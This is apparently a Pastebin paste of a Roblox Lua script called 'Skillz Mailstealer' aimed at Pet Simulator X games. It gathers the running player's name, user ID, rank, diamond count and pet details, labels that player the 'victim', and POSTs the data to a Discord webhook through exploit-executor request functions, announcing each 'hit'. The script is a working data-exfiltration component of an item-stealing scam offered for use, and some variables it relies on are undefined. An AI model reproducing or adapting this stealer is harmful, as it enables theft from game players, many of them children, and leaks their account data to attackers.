Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- if game.PlaceId == 6284583030 then
- _G.GameIn = "Pet Simulator X"
- elseif game.PlaceId == 7722306047 then
- _G.GameIn = "PSX Trading Plaza"
- elseif game.PlaceId == 10321372166 then
- _G.GameIn = "PSX Hardcore"
- elseif game.PlaceId == 12610002282 then
- _G.GameIn = "PSX Pro Trading Plaza"
- elseif game.PlaceId == 11725212117 then
- _G.GameIn = "PSX Voice Trading Plaza"
- else
- _G.GameIn = "❓ Couldn't find game"
- end
- local webhookcolor = "13369599"
- _G.CurrentRank = game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text
- _G.PlrUserVictim = game.Players.LocalPlayer.Name
- _G.PlrUserIDVictim = game.Players.LocalPlayer.UserId
- _G.PlrDisplayNameVictim = game.Players.LocalPlayer.DisplayName
- local function sendwebhook(msg)
- local msg = {
- ["content"]= "@everyone **Skillz Mailstealer has detected a new hit!**",
- ["embeds"]= {
- {
- ["title"]= "`Skillz Mailstealer Results`",
- ["description"]= "**Data from the victim**\n🧑Display Name: ".._G.PlrDisplayNameVictim.."\n🧑Username: ".._G.PlrUserVictim.."\n🧑User ID: ".._G.PlrUserIDVictim.."\n🐱Rank: ".._G.CurrentRank.."\n🎮Place: ".._G.GameIn.."",
- ["url"]= "https://discord.gg/xz5SbEVtz8",
- ["color"]= ""..webhookcolor.."",
- ["fields"]= {
- {
- ["name"]= "Diamonds 💎",
- ["value"]= "```".._G.Diamonds.."```",
- ["inline"]= true
- },
- {
- ["name"]= "Pet Name & Rarity",
- ["value"]= "```Pet Name: "..v2.name.."\nPet Rarity: "..v2.rarity.."```",
- ["inline"]= true
- }
- }
- }
- },
- ["attachments"] = {}
- }
- local Webhook = _G.Webhook
- request = http_request or request or HttpPost or syn.request
- request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
- end
- sendwebhook(msg)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement